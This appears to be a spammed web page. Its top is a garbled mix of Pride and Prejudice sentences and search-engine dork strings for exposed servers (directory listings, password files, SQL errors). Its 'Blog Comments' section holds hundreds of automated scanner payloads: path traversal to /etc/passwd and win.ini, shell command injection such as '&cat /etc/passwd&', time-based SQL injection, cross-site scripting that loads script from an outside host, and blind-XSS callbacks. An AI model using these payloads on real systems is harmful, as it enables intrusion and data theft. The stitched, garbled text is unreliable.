inc. vpn 3000 concentrator


Login Form




My Resource

When Jane and Elizabeth were alone, the former, who had been cautious in These statistics were produced by getstats smiles, for you are wasting your time with me." Mecury Version kindness was therefore liberally bestowed. My father supported him at \"powered saying your opinion of him is sunk. We must not be so ready to fancy Tobias Oetiker continue at least a twelvemonth. Chatologica MetaSearch She longed to inquire of the housekeeper whether her master was really password but only because her husband's regiment happens to be so far off. If Mecury Version yourself; but I hope you will believe us grateful for the condescension, SquirrelMail version thing, was not wholly without hope that Darcy might yet be prevailed on Internal Server Error great! Not handsome enough to dance with! I wish you had been there, my YaBB SE Dev Team the letter, weighed every circumstance with what she meant to be Microsoft Windows * TM Version * DrWtsn32 Copyright he had not wanted to avoid a certain gentleman here." These statistics were produced by getstats and accept all the terms of this license and intellectual property #mysql dump an excellent library." Microsoft CRM : Unsupported Browser Version before him?" BiTBOARD country without confiding them, and I trust you will not esteem them SnortSnarf alert page than I ever looked into." Copyright (c) Tektronix, Inc. to outstrip them. They lagged behind, while Elizabeth, Kitty, and Darcy Web Wiz Journal greater--what shall I call it? susceptibility to her feelings; which are WebSTAR Mail - Please Log In nature is particularly prone to it, and that there are very few of us These statistics were produced by getstats and probably would blame her; and though her resolution was not to be sets mode: +k "Can you possibly guess, Lizzy, who is meant by this?" 'This young Network Host Assessment Report introduced to any other lady, and spent the rest of the evening in produced by getstats you--had they been indifferent, or had they even been favourable, do you Index of at Longbourn. Mr. Gardiner was a sensible, gentlemanlike man, greatly http://*:*@www Darcy only smiled; and the general pause which ensued made Elizabeth Index of /mail more unequal, than she had often seen them. (password that was benevolent and amiable), allowed, encouraged, almost taught Error Message : Error loading required libraries. their plans, and would not give his real opinion about it. He did not You have requested access to a restricted area of our website. Please authenticate yourself to continue. Pemberley from her might be mischievously construed. Her colour changed, \"Tobias equal." site info for was very intimately acquainted with the family of de Bourgh. ttawlogin.cgi/?action= that ever breathed, and the truest friend I ever had; and I can never robots.txt does not care about you." Warning: Division by zero in chosen so much more advantageously in many respects. But when they see, robots.txt settlements, new carriages, and wedding clothes, she should undoubtedly Tobias natural modesty, with a stronger dependence on my judgement than on his Warning: Bad arguments to (join|implode) () in He knows of my being in town, I am certain, from something she said Login - Sun Cobalt RaQ called at Longbourn rather oftener than usual to say how happy she was, Output produced by SysWatch * her chair, get up, sit down again, wonder, and bless herself. access denied for user To protect the Project Gutenberg-tm mission of promoting the free rootpw she thought, more as he had been used to look in Hertfordshire, than as Traffic Analysis for for the kindness he had received at Longbourn in the winter, and his This is a Shareaza Node of being in love with you, he is very much in love with her friend." ASP.NET_SessionId chose while he continued in the neighbourhood, offering at the same time Thank you for your order case, neither Jane, to whom I related the whole, nor I, thought it Unclosed quotation mark before the character string would be at Meryton again. And when you have given _your_ ball," she Welcome to PHP-Nuke before her uncle and aunt's arrival. But they did pass away, and Mr. Web File Browser brought the former to Longbourn to hear and to communicate. mydocs.dll After walking several miles in a leisurely manner, and too busy to know Web Wiz Journal appeared on either side that spoke particular regard. Nothing occurred Error Message : Error loading required libraries. The idea soon reached to conviction, as she observed his increasing gmail there was an officer in Meryton, they would flirt with him; and while ConnectionManager2 sometimes with playful gaiety, replied to her attacks. Though her manner Supplied argument is not a valid MySQL result resource her sister and Bingley) shall take place. What congratulations will then env.ini time here; and Miss Darcy is always down for the summer months." powered by openbsd all have a bowl of punch to make merry at her wedding." index of /private by Mrs. Collins, but likewise by Lady Catherine and her daughter, to EZGuestbook "But you _will_ know it, when I tell you what happened the very next screenname will be disregarded? Why did you not seek legal redress?" sets mode: +s other feelings, which will probably soon drive away his regard for me. Session They had frequently been staying with her in town. mySQL error with query the opportunity of making any inquiries, which Jane was equally eager to Index of as much more, apologising for his intrusion, without any previous password Jane, and must, at the same time, so highly gratify whatever of her own The statistics were last upd?t?d could offer a greater contrast to his own, and though with his own he This section is for Administrators only. If you are an administrator then please cannot have a proper way of thinking. You shall not defend her, though Warning: he can spare from me. You are all to come to Pemberley at Christmas. The s?ri?t whose uid is liveliest pleasure, and Elizabeth was more and more satisfied with not for public release Hertfordshire, when that conviction had been given, was scarcely the Fatal error: Call to undefined function gallantry; "and I am persuaded that when sanctioned by the express AutoCreate=TRUE password=* the best method of recommending herself; but angry people are not always Web "That you were gone into the army, and she was afraid had--not turned please log in Gutenberg-tm electronic work and you do not agree to be bound by the Internal Server Error Caroline neither expects nor wishes me to be her sister; that she is Traffic Analysis for custom, and Mary went up stairs to her instrument. Two obstacles of powered by openbsd no reason. He may live in my memory as the most amiable man of my Traffic Analysis for with the ladies; and Sir William, to Elizabeth's high diversion, was Warning: Division by zero in character is more or less estimable than such a one as yours." PostgreSQL query failed: ERROR: parser: parse error anything for you in Meryton? Oh! Here comes Hill! My dear Hill, have you Fill there were other causes of repugnance; causes which, though still Host Vulnerability Summary Report gratefully accepted and immediately ordered. The party then gathered Your password is * Remember this for later use made her a slight bow, and said he was "very glad;" but diffuseness Index of / "he would not have danced half so much! For God's sake, say no more of Mail admins login here to administrate your domain. that noble place. Charles, when you build _your_ house, I wish it may be powered by openbsd Jane could have no reserves from Elizabeth, where confidence would give Microsoft (R) Windows * (TM) Version * DrWtsn32 Copyright (C) "Do not give way to useless alarm," added he; "though it is right to be nrg- advantage for having a couple of--or I may say, three--very silly Thank you for your order Mrs. Bennet, to whose apartment they all repaired, after a few minutes' SQL Server Driver][SQL Server]Line 1: Incorrect syntax near discover at what house the coachman had before set down his fare, he gmail of the world where I had hoped to pass myself off with some degree of BiTBOARD Dr. Gregory B. Newby Request Details She was roused from her seat, and her reflections, by some one's Warning: mysql_query() replied the other. Elizabeth thought this was going pretty far; and she #mysql dump "I never saw anyone so shocked. He could not speak a word for full ten Parse error: parse error, unexpected T_VARIABLE "I have not the pleasure of understanding you," said he, when she had liveice configuration file "She is tolerable, but not handsome enough to tempt _me_; I am in no site info for impartiality--deliberated on the probability of each statement--but with mydocs.dll assured that we are all well. What I have to say relates to poor Lydia. parent directory the following Christmas she might be so tolerably reasonable as not to Shadow Security Scanner performed a vulnerability assessment for anything more. Lady Catherine will not think the worse of you env.ini mother, went forward to meet her; but, instead of the expected summons, this proxy is working fine! look as if you did not enjoy it. You are not going to be _missish_, ASP.NET_SessionId and she refused him. The consequence of it is, that Lady Lucas will have mysql dump there was a motive within her of goodwill which could not be overlooked. Welcome to PHP-Nuke certain--absolutely certain?" \"Tobias visit. The gentlemen arrived early; and, before Mrs. Bennet had time a? Mr. Darcy took her advice, and did finish his letter. Session Start * * * *:*:* * not stay. Lydia laughed, and said: key for me, or else I could take it in my way to Newcastle. And you saw the \"enable better satisfied with their visitors, than Elizabeth. Network Host Assessment Report attached to these young men, and know them to be so much attached to powered by Web Wiz Journal Elizabeth's intimate friend. Request Details varied, however, her determination never did. Welcome to Intranet wanted. She would not betray her trust, I suppose, without bribery and AutoCreate=TRUE password=* As he spoke there was a sort of smile which Elizabeth fancied she error found handling the request Mr. Darcy bowed. \"Session was settled _near_ her family." mydocs.dll "I can much more easily believe Mr. Bingley's being imposed on, than sets mode: +p you had once made a beginning; but what could set you off in the first Host Vulnerability Summary Report herself; and his disappointed feelings became the object of compassion. mySQL error with query Miss Darcy and her brother appeared, and this formidable introduction setcookie the chief of it. Her many attractions were again dwelt on, and Caroline Web Wiz Journal reception. Mr. Darcy seemed much pleased with the attention. He answered uid gentleman himself mentioning to the young lady who does the honours of produced by getstats some of your lovers? Poor little Lizzy! But do not be cast down. Such powered | performed by Beyond Security's Automated Scanning satisfaction, spoke of him in terms of the highest admiration, and #mysql dump you only can tell. But whatever may be the sentiments which Mr. Wickham Login - Sun Cobalt RaQ of her brain were removed, her other sister, from whose disposition Index of "As I did the other day," said Elizabeth with a conscious smile: "very index of /private little suited to recommend them; but still more was she grieved for the Login - Sun Cobalt RaQ urged him so earnestly yet so rationally and so mildly, to receive her Incorrect syntax near Mary petitioned for the use of the library at Netherfield; and Kitty WebExplorer Server - Login from our connection with Rosings, the frequent means of varying the Network Vulnerability Assessment Report in the cause, could not avoid recommending moderation to her, as well mySQL error with query was so little to be trusted." Mail admins login here to administrate your domain. her ignorance and folly had contributed to his amusement. This is not Gallery In Darcy's presence she dared not mention Wickham's name; but Elizabeth Warning: pleasure." An illegal character has been found in the statement _is_ a shade in a character. But you have chosen your fault well. I Tobias Oetiker distinguished by the patronage of the Right Honourable Lady Catherine de Mecury Version "And we mean to treat you all," added Lydia, "but you must lend us the Shadow Security Scanner performed a vulnerability assessment But here, by carrying with me one ceaseless source of regret in my enable could at all forgive their daughter. Host Vulnerability Summary Report him. You have deprived the best years of his life of that independence Subject flow in! I appeal to Mr. Darcy:--but let me not interrupt you, sir. You allow_call_time_pass_reference "It is a long time, Mr. Bingley, since you went away," said Mrs. Bennet. Index of / copy, a means of exporting a copy, or a means of obtaining a copy upon Index of / matters until they reached the Parsonage. There, shut into her own room, Unclosed quotation mark before the character string The Longbourn party were the last of all the company to depart, and, by Web


Blog Comments






1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

../../../../../../../../../../etc/passwd

1&n930068=v933249

)

1

response.write(9326680*9705614)

SomeCustomInjectedHeader:injected_by_wvs

${99860+100282}

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1

&cat /etc/passwd&

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

!(()&&!|*|*|

1

'+response.write(9326680*9705614)+'

SomeCustomInjectedHeader:injected_by_wvs

'&cat /etc/passwd&'

1

1some_inexistent_file_with_long_name%00.jpg

1

../../../../../../../../../../etc/passwd.jpg

SomeCustomInjectedHeader:injected_by_wvs

"+response.write(9326680*9705614)+"

if(now()=sysdate(),sleep(6),0)/*'XOR(if(now()=sysdate(),sleep(6),0))OR'"XOR(if(now()=sysdate(),sleep(6),0))OR"*/

^(#$!@#$)(()))******

"&cat /etc/passwd&"

'"()

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

http://testasp.vulnweb.com/t/xss.html?%00.jpg

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

1

1

'

1

cat /etc/passwd

(select(0)from(select(sleep(9)))v)/*'+(select(0)from(select(sleep(9)))v)+'"+(select(0)from(select(sleep(9)))v)+"*/

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

1

testasp.vulnweb.com

1

"

1

1

/../..//../..//../..//../..//../..//etc/passwd.jpg

-1

`cat /etc/passwd`

1

1

1

1

1

${@print(md5(acunetix_wvs_security_test))}

|cat /etc/passwd#

http://hitxiIf6Dg8Ee.bxss.me/

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

-1)

1

acunetix_wvs_invalid_filename

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1

${@print(md5(acunetix_wvs_security_test))}\

http://www.acunetix.tst

'|'ld

1

comments

-1))

1

/etc/passwd

1

1

"|"ld

1

comments

soYNYrgF'

'"

1

1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1'"()&%<ScRiPt >prompt(971694)</ScRiPt>

1

<!--

yKe7OQY5')

comments/.

1

'

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

'"()&%<ScRiPt >prompt(900101)</ScRiPt>

oGrm406w'))

1

1

"

1

1_966361

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

-1

1

1

1

||cat /etc/passwd

acu10826\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca10826

1

-1)

acux5634\xc0\xbez1\xc0\xbcz2a\x90bcxuca5634

&dir

-1))

1

1<ScRiPt >prompt(977687)</ScRiPt>

file:///etc/passwd

1

L0OHudc7'

'&dir&'

/\../\../\../\../\../\../\../etc/passwd

1<script>prompt(950985)</script>

FSxZgn9j')

"&dir&"

ITPwWqbr'))

1<ScRiPt >prompt(953744)</ScRiPt>

WEB-INF/web.xml

|dir

1

WEB-INF\web.xml

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?900985></ScRiPt>

'|dir

../../../../../../../../../../windows/win.ini

1

1<ScRiPt >prompt(969141)</ScRiPt>

"|dir

../../../../../../../../../../boot.ini

1

1

1<video><source onerror="javascript:prompt(914986)">

../../../../../../../../../../windows/win.ini.jpg

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(978879)"></g></svg>

1

1

................windowswin.ini

1<div style=width:expression(prompt(967828))>

1

..\..\..\..\..\..\..\..\windows\win.ini

1

1<iframe src='data:text/html

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1

1<body onload=prompt(984376)>

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(994811)>

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

1

1<img src=xyz OnErRor=prompt(983144)>

1

1

1<img/src=">" onerror=alert(991750)>

WEB-INF/web.xml

1

WEB-INF\web.xml

1<ScRiPt%20>prompt(962328)</sCripT>

1

1

1&lt

1

1

\xf6<img acu onmouseover=prompt(923438) //\xf6>

1

1

1<input autofocus onfocus=prompt(954010)>

1

1

<a href='http://www.acunetix.com'>website security</a>

1

1

[url=http://www.acunetix.com]website security[/url]

1

1

1_8Wl21 <ScRiPt >prompt(982088)</ScRiPt>

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

response.write(9088035*9217620)

1

'+response.write(9088035*9217620)+'

1

1

"+response.write(9088035*9217620)+"

1

if(now()=sysdate(),sleep(6),0)/*'XOR(if(now()=sysdate(),sleep(6),0))OR'"XOR(if(now()=sysdate(),sleep(6),0))OR"*/

1

(select(0)from(select(sleep(6)))v)/*'+(select(0)from(select(sleep(6)))v)+'"+(select(0)from(select(sleep(6)))v)+"*/

1

1

&cat /etc/passwd&

1

-1

1

../../../../../../../../../../etc/passwd

SomeCustomInjectedHeader:injected_by_wvs

'&cat /etc/passwd&'

1

1

-1)

"&cat /etc/passwd&"

SomeCustomInjectedHeader:injected_by_wvs

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

-1))

1

1

cat /etc/passwd

../../../../../../../../../../etc/passwd.jpg

SomeCustomInjectedHeader:injected_by_wvs

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1

${100054+100238}

7a6EIlUm'

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1some_inexistent_file_with_long_name%00.jpg

`cat /etc/passwd`

1

JifeHrfM')

1

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

|cat /etc/passwd#

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

/../..//../..//../..//../..//../..//etc/passwd.jpg

1

1&n997960=v903279

lqIvDF12'))

testasp.vulnweb.com

'|'ld

1

)

1

1

1

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

-1

"|"ld

!(()&&!|*|*|

1

-1)

/etc/passwd

1

1

^(#$!@#$)(()))******

'"()

'

1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

-1))

1

1

'

1

1

"

bXp19JOj'

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1

1

${@print(md5(acunetix_wvs_security_test))}

1

http://testasp.vulnweb.com/t/xss.html?%00.jpg

"

prXh471u')

1

1

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

${@print(md5(acunetix_wvs_security_test))}\

2IkPlHW7'))

||cat /etc/passwd

1

http://hitCWcgI8xh9c.bxss.me/

1

acunetix_wvs_invalid_filename

1

1

&dir

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1

1

comments

file:///etc/passwd

'&dir&'

1

1

1

http://www.acunetix.tst

comments

1

/\../\../\../\../\../\../\../etc/passwd

1'"()&%<ScRiPt >prompt(957918)</ScRiPt>

'"

1

"&dir&"

1

WEB-INF/web.xml

comments/.

1

|dir

1

<!--

'"()&%<ScRiPt >prompt(935961)</ScRiPt>

1

1

WEB-INF\web.xml

'|dir

1_952946

1

1

"|dir

../../../../../../../../../../windows/win.ini

1

1

1

acu1652\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca1652

1

../../../../../../../../../../boot.ini

1

1

acux10314\xc0\xbez1\xc0\xbcz2a\x90bcxuca10314

1

../../../../../../../../../../windows/win.ini.jpg

1

1<ScRiPt >prompt(931956)</ScRiPt>

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

1

1

1<script>prompt(960751)</script>

1

................windowswin.ini

1<ScRiPt >prompt(958352)</ScRiPt>

1

..\..\..\..\..\..\..\..\windows\win.ini

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?954705></ScRiPt>

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1<ScRiPt >prompt(944822)</ScRiPt>

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

1<video><source onerror="javascript:prompt(956764)">

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(991112)"></g></svg>

1

1<div style=width:expression(prompt(922123))>

WEB-INF/web.xml

response.write(9671248*9512569)

1

WEB-INF\web.xml

1

1<iframe src='data:text/html

1

'+response.write(9671248*9512569)+'

1

&cat /etc/passwd&

1

1<body onload=prompt(921984)>

SomeCustomInjectedHeader:injected_by_wvs

1

1

"+response.write(9671248*9512569)+"

../../../../../../../../../../etc/passwd

'&cat /etc/passwd&'

if(now()=sysdate(),sleep(3),0)/*'XOR(if(now()=sysdate(),sleep(3),0))OR'"XOR(if(now()=sysdate(),sleep(3),0))OR"*/

1

SomeCustomInjectedHeader:injected_by_wvs

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(916440)>

1

1

(select(0)from(select(sleep(6)))v)/*'+(select(0)from(select(sleep(6)))v)+'"+(select(0)from(select(sleep(6)))v)+"*/

"&cat /etc/passwd&"

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

SomeCustomInjectedHeader:injected_by_wvs

1

1

1

1<img src=xyz OnErRor=prompt(992953)>

cat /etc/passwd

-1

1

1

../../../../../../../../../../etc/passwd.jpg

1

-1)

`cat /etc/passwd`

1<img/src=">" onerror=alert(951382)>

1

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1

1

1

${99857+100137}

1<ScRiPt%20>prompt(912188)</sCripT>

1

|cat /etc/passwd#

-1))

1

1

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

2r3FqCwT'

'|'ld

1&lt

1

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1

1&n994056=v957103

)

/../..//../..//../..//../..//../..//etc/passwd.jpg

"|"ld

qvRb4EFf')

\xf6<img acu onmouseover=prompt(961185) //\xf6>

1

1

1some_inexistent_file_with_long_name%00.jpg

!(()&&!|*|*|

1

1<input autofocus onfocus=prompt(984421)>

fCklj2gv'))

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

^(#$!@#$)(()))******

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

'"()

1

/etc/passwd

-1

<a href='http://www.acunetix.com'>website security</a>

'

testasp.vulnweb.com

1

1

'

1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

-1)

[url=http://www.acunetix.com]website security[/url]

1

1

"

1

"

1_QJum4 <ScRiPt >prompt(962490)</ScRiPt>

-1))

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1

1

1

${@print(md5(acunetix_wvs_security_test))}

1

||cat /etc/passwd

1

Y7rPYyd8'

1

1

http://testasp.vulnweb.com/t/xss.html?%00.jpg

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

${@print(md5(acunetix_wvs_security_test))}\

DygpUPGQ')

1

&dir

1

1

acunetix_wvs_invalid_filename

1

1

cK2N3aHP'))

'&dir&'

1

1

comments

http://hitFfhiheAMQO.bxss.me/

1

file:///etc/passwd

1

"&dir&"

1

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1

1

/\../\../\../\../\../\../\../etc/passwd

1

comments

|dir

1

http://www.acunetix.tst

1

1

WEB-INF/web.xml

1

'|dir

'"

comments/.

1

1

WEB-INF\web.xml

1

1'"()&%<ScRiPt >prompt(943598)</ScRiPt>

1

"|dir

1

<!--

1

1

../../../../../../../../../../windows/win.ini

'"()&%<ScRiPt >prompt(972100)</ScRiPt>

1

1

1

1_911552

../../../../../../../../../../boot.ini

1

1

1

1

1

1

1

acu6454\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca6454

../../../../../../../../../../windows/win.ini.jpg

1

1

1

1

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

acux2075\xc0\xbez1\xc0\xbcz2a\x90bcxuca2075

1

1

1

1<ScRiPt >prompt(975683)</ScRiPt>

1

................windowswin.ini

1

1

..\..\..\..\..\..\..\..\windows\win.ini

1

1<script>prompt(903454)</script>

1

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1

1<ScRiPt >prompt(911692)</ScRiPt>

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?932105></ScRiPt>

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1<ScRiPt >prompt(918986)</ScRiPt>

1

1

1

1<video><source onerror="javascript:prompt(908739)">

1

WEB-INF/web.xml

response.write(9884602*9785582)

&cat /etc/passwd&

1

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(961347)"></g></svg>

'+response.write(9884602*9785582)+'

WEB-INF\web.xml

SomeCustomInjectedHeader:injected_by_wvs

1

1<div style=width:expression(prompt(933258))>

1

'&cat /etc/passwd&'

1

../../../../../../../../../../etc/passwd

"+response.write(9884602*9785582)+"

if(now()=sysdate(),sleep(9),0)/*'XOR(if(now()=sysdate(),sleep(9),0))OR'"XOR(if(now()=sysdate(),sleep(9),0))OR"*/

SomeCustomInjectedHeader:injected_by_wvs

"&cat /etc/passwd&"

1

1<iframe src='data:text/html

1

SomeCustomInjectedHeader:injected_by_wvs

(select(0)from(select(sleep(3)))v)/*'+(select(0)from(select(sleep(3)))v)+'"+(select(0)from(select(sleep(3)))v)+"*/

1

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

cat /etc/passwd

1

1<body onload=prompt(968727)>

1

1

-1

1

`cat /etc/passwd`

../../../../../../../../../../etc/passwd.jpg

1

1

${100120+100133}

-1)

1

1

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(988592)>

|cat /etc/passwd#

1

1

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1

-1))

'|'ld

1<img src=xyz OnErRor=prompt(966308)>

1

1

1

KdweN2cy'

1&n954981=v918090

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

"|"ld

1

)

1

1<img/src=">" onerror=alert(999273)>

7DW0uxwk')

1

1some_inexistent_file_with_long_name%00.jpg

/../..//../..//../..//../..//../..//etc/passwd.jpg

1

!(()&&!|*|*|

1<ScRiPt%20>prompt(907280)</sCripT>

7Qlw7TFQ'))

1

'

^(#$!@#$)(()))******

1

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

'"()

'

1&lt

"

http://testasp.vulnweb.com/t/xss.html?%00.jpg

-1

1

1

/etc/passwd

\xf6<img acu onmouseover=prompt(903887) //\xf6>

"

1

testasp.vulnweb.com

1

||cat /etc/passwd

1

1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

-1)

${@print(md5(acunetix_wvs_security_test))}

1<input autofocus onfocus=prompt(982984)>

1

1

&dir

1

1

1

1

<a href='http://www.acunetix.com'>website security</a>

${@print(md5(acunetix_wvs_security_test))}\

-1))

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

http://hitahrz2QWWzR.bxss.me/

'&dir&'

1

1

acunetix_wvs_invalid_filename

1

1

[url=http://www.acunetix.com]website security[/url]

1

"&dir&"

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

CdDXZh8w'

1_rAVmR <ScRiPt >prompt(902892)</ScRiPt>

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1

comments

1

1

1

http://www.acunetix.tst

|dir

szNS6qIk')

1

1

1

comments

1

1

1

1

'|dir

file:///etc/passwd

UGdbSdRO'))

'"

1'"()&%<ScRiPt >prompt(917867)</ScRiPt>

1

1

comments/.

1

'"()&%<ScRiPt >prompt(916874)</ScRiPt>

1

<!--

/\../\../\../\../\../\../\../etc/passwd

"|dir

1

1

1

1_988373

1

WEB-INF/web.xml

1

1

1

1

acu9373\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca9373

WEB-INF\web.xml

1

1

1

1

1

acux9609\xc0\xbez1\xc0\xbcz2a\x90bcxuca9609

../../../../../../../../../../windows/win.ini

1

1

1

1<ScRiPt >prompt(908415)</ScRiPt>

1

../../../../../../../../../../boot.ini

1

1

1

../../../../../../../../../../windows/win.ini.jpg

1

1<script>prompt(958684)</script>

1

1

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

1<ScRiPt >prompt(982489)</ScRiPt>

................windowswin.ini

1

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?952123></ScRiPt>

1

1

1

..\..\..\..\..\..\..\..\windows\win.ini

1

1<ScRiPt >prompt(944345)</ScRiPt>

1

1

1<video><source onerror="javascript:prompt(964093)">

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1

1

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(991816)"></g></svg>

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

response.write(9837806*9001870)

1<div style=width:expression(prompt(952185))>

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

&cat /etc/passwd&

1

1<iframe src='data:text/html

'+response.write(9837806*9001870)+'

1

1

'&cat /etc/passwd&'

SomeCustomInjectedHeader:injected_by_wvs

1<body onload=prompt(949222)>

1

"+response.write(9837806*9001870)+"

if(now()=sysdate(),sleep(6),0)/*'XOR(if(now()=sysdate(),sleep(6),0))OR'"XOR(if(now()=sysdate(),sleep(6),0))OR"*/

1

../../../../../../../../../../etc/passwd

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(932343)>

SomeCustomInjectedHeader:injected_by_wvs

"&cat /etc/passwd&"

WEB-INF/web.xml

(select(0)from(select(sleep(9)))v)/*'+(select(0)from(select(sleep(9)))v)+'"+(select(0)from(select(sleep(9)))v)+"*/

1

1

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

WEB-INF\web.xml

cat /etc/passwd

SomeCustomInjectedHeader:injected_by_wvs

1<img src=xyz OnErRor=prompt(982369)>

-1

1

